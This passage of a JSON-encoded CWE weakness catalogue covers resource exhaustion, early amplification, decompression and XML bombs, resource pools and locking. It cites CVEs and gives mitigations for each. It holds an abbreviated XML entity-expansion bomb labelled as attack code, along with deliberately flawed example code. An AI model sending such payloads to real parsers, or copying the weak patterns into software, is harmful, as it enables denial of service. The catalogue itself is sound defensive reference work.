reached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"The typical consequence is CPU consumption, but memory consumption and consumption of other resources can also occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0244","Description":"CPU consumption via inputs that cause many hash table collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0244"},{"Reference":"CVE-2003-0364","Description":"CPU consumption via inputs that cause many hash table collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0364"},{"Reference":"CVE-2002-1203","Description":"Product performs unnecessary processing before dropping an invalid packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1203"},{"Reference":"CVE-2001-1501","Description":"CPU and memory consumption using many wildcards.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1501"},{"Reference":"CVE-2004-2527","Description":"Product allows attackers to cause multiple copies of a program to be loaded more quickly than the program can detect that other copies are running, then exit. This type of error should probably have its own category, where teardown takes more time than initialization.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2527"},{"Reference":"CVE-2006-6931","Description":"Network monitoring system allows remote attackers to cause a denial of service (CPU consumption and detection outage) via crafted network traffic, aka a \\"backtracking attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6931"},{"Reference":"CVE-2006-3380","Description":"Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3380"},{"Reference":"CVE-2006-3379","Description":"Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3379"},{"Reference":"CVE-2005-2506","Description":"OS allows attackers to cause a denial of service (CPU consumption) via crafted Gregorian dates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2506"},{"Reference":"CVE-2005-1792","Description":"Memory leak by performing actions faster than the software can clear them.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1792"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Algorithmic Complexity"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-395"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Functional_Areas, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Algorithmic Complexity","attr":{"@_Date":"2019-06-20"}}}},"408":{"attr":{"@_ID":"408","@_Name":"Incorrect Behavior Order: Early Amplification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows an entity to perform a legitimate but expensive operation before authentication or authorization has taken place.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This data prints the contents of a specified file requested by a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function printFile($username,$filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$file = file_get_contents($filename);if ($file &amp;&amp; isOwnerOf($username,$filename)){}else{}return false;","xhtml:br":["","","","",""],"xhtml:i":"//read file into string","xhtml:div":[{"#text":"echo $file;return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'You are not authorized to view this file\';","attr":{"@_style":"margin-left:10px;"}}]}}}},"Body_Text":"This code first reads a specified file into memory, then prints the file if the user is authorized to see its contents. The read of the file into memory may be resource intensive and is unnecessary if the user is not allowed to see the file anyway."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2458","Description":"Tool creates directories before authenticating user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2458"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Early Amplification"}},"Notes":{"Note":{"#text":"Overlaps authentication errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Early Amplification","attr":{"@_Date":"2008-04-11"}}}},"409":{"attr":{"@_ID":"409","@_Name":"Improper Handling of Highly Compressed Data (Data Amplification)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output.","Extended_Description":"An example of data amplification is a \\"decompression bomb,\\" a small ZIP file that can produce a large amount of data when it is decompressed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-53"},"Intro_Text":"The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"XML"},"xhtml:div":{"#text":"&lt;?xml version=\\"1.0\\"?&gt;&lt;!DOCTYPE MaliciousDTD [&lt;!ENTITY ZERO \\"A\\"&gt;&lt;!ENTITY ONE \\"&amp;ZERO;&amp;ZERO;\\"&gt;&lt;!ENTITY TWO \\"&amp;ONE;&amp;ONE;\\"&gt;...&lt;!ENTITY THIRTYTWO \\"&amp;THIRTYONE;&amp;THIRTYONE;\\"&gt;]&gt;&lt;data&gt;&amp;THIRTYTWO;&lt;/data&gt;","xhtml:br":["","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1955","Description":"XML bomb in web server module","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955"},{"Reference":"CVE-2003-1564","Description":"Parsing library allows XML bomb","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1564"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Data Amplification"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS04-J","Entry_Name":"Limit the size of files passed to ZipInputStream"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Data Amplification","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Highly Compressed Data (Data Amplification)","attr":{"@_Date":"2009-05-27"}}]}},"410":{"attr":{"@_ID":"410","@_Name":"Insufficient Resource Pool","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s resource pool is not large enough to handle peak demand, which allows an attacker to prevent others from accessing the resource by using a (relatively) large number of requests for resources.","Extended_Description":"Frequently the consequence is a \\"flood\\" of connection or sessions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"400","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Other"],"Impact":["DoS: Crash, Exit, or Restart","Other"],"Note":"Floods often cause a crash or other problem besides denial of the resource itself; these are likely examples of *other* vulnerabilities, not an insufficient resource pool."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not perform resource-intensive transactions for unauthenticated users and/or invalid requests."},{"Phase":"Architecture and Design","Description":"Consider implementing a velocity check mechanism which would detect abusive behavior."},{"Phase":"Operation","Description":"Consider load balancing as an option to handle heavy loads."},{"Phase":"Implementation","Description":"Make sure that resource handles are properly closed when no longer needed."},{"Phase":"Architecture and Design","Description":"Identify the system\'s resource intensive operations and consider protecting them from abuse (e.g. malicious automated script which runs the resources out)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following snippet from a Tomcat configuration file, a JDBC connection pool is defined with a maximum of 5 simultaneous connections (with a 60 second timeout). In this case, it may be trivial for an attacker to instigate a denial of service (DoS) by using up all of the available connections in the pool.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;Resource name=\\"jdbc/exampledb\\"auth=\\"Container\\"type=\\"javax.sql.DataSource\\"removeAbandoned=\\"true\\"removeAbandonedTimeout=\\"30\\"maxActive=\\"5\\"maxIdle=\\"5\\"maxWait=\\"60000\\"username=\\"testuser\\"password=\\"testpass\\"driverClassName=\\"com.mysql.jdbc.Driver\\"url=\\"jdbc:mysql://localhost/exampledb\\"/&gt;","xhtml:br":["","","","","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1363","Description":"Large number of locks on file exhausts the pool and causes crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1363"},{"Reference":"CVE-2001-1340","Description":"Product supports only one connection and does not disconnect a user who does not provide credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1340"},{"Reference":"CVE-2002-0406","Description":"Large number of connections without providing credentials allows connection exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0406"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Resource Pool"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS00-J","Entry_Name":"Use thread pools to enable graceful degradation of service during traffic bursts"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, &#34;Protecting Against Denial of Service Attacks&#34; Page 517"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"412":{"attr":{"@_ID":"412","@_Name":"Unrestricted Externally Accessible Lock","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control.","Extended_Description":"This prevents the software from acting on associated resources or performing other behaviors that are controlled by the presence of the lock. Relevant locks might include an exclusive lock or mutex, or modifying a shared resource that is treated as a lock. If the lock can be held for an indefinite period of time, then the denial of service could be permanent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"410","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"When an attacker can control a lock, the program may wait indefinitely until the attacker releases the lock, causing a denial of service to other users of the program. This is especially problematic if there is a blocking operation on the lock."}},"Detection_Methods":{"Detection_Method":{"Method":"White Box","Description":"Automated code analysis techniques might not be able to reliably detect this weakness, since the application\'s behavior and general security model dictate which resource locks are critical. Interpretation of the weakness might require knowledge of the environment, e.g. if the existence of a file is used as a lock, but the file is created in a world-writable directory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Use any access control that is offered by the functionality that is offering the lock."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use unpredictable names or identifiers for the locks. This might not always be possible or feasible."},{"Phase":"Architecture and Design","Description":"Consider modifying your code to use non-blocking synchronization methods."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-69"},"Intro_Text":"This code tries to obtain a lock for a file, then writes to it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function writeToLog($message){}fclose($logFile);","xhtml:div":{"#text":"$logfile = fopen(\\"logFile.log\\", \\"a\\");if (flock($logfile, LOCK_EX)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//attempt to get logfile lock","xhtml:div":[{"#text":"fwrite($logfile,$message);flock($logfile, LOCK_UN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// unlock logfile"},{"#text":"print \\"Could not obtain lock on logFile.log, message not recorded\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},"xhtml:br":""}},"Body_Text":"PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock()."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0682","Description":"Program can not execute when attacker obtains a mutex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0682"},{"Reference":"CVE-2002-1914","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1914"},{"Reference":"CVE-2002-1915","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1915"},{"Reference":"CVE-2002-0051","Description":"Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0051"},{"Reference":"CVE-2000-0338","Description":"Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0338"},{"Reference":"CVE-2000-1198","Description":"Chain: Lock files with predictable names. Resultant from randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1198"},{"Reference":"CVE-2002-1869","Description":"Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1869"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unrestricted Critical Resource Lock"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Deadlock"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK00-J","Entry_Name":"Use private final lock objects to synchronize classes that may interact with untrusted code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK07-J","Entry_Name":"Avoid deadlock by requesting and releasing locks in the same order"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP22","Entry_Name":"Unrestricted lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Notes":{"Note":{"#text":"This overlaps Insufficient Resource Pool when the \\"pool\\" is of size 1. It can also be resultant from race conditions, although the timing window could be quite large in some cases.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Importance":"Critical","Modification_Comment":"Suggested a better name and the minimal relationship with resources regardless of their criticality."},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Added a White_Box_Definition and clarified the consequences."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Organization":"KDM Analytics","Contribution_Date":"2008-08-29","Contribution_Comment":"suggested clarification of description and observed examples, which were vague and inconsistent."},"Previous_Entry_Name":[{"#text":"Unrestricted Critical Resource Lock","attr":{"@_Date":"2008-04-11"}},{"#text":"Unrestricted Lock on Critical Resource","attr":{"@_Date":"2009-07-27"}}]}},"413":{"attr":{"@_ID":"413","@_Name":"Improper Resource Locking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not lock or does not correctly lock a resource when the software must have exclusive access to the resource.","Extended_Description":"When a resource is not properly locked, an attacker could modify the resource while it is being operated on by the software. This might violate the software\'s assumption that the resource will not change, potentially leading to unexpected behaviors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a non-conflicting privilege scheme."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use synchronization when locking a resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int 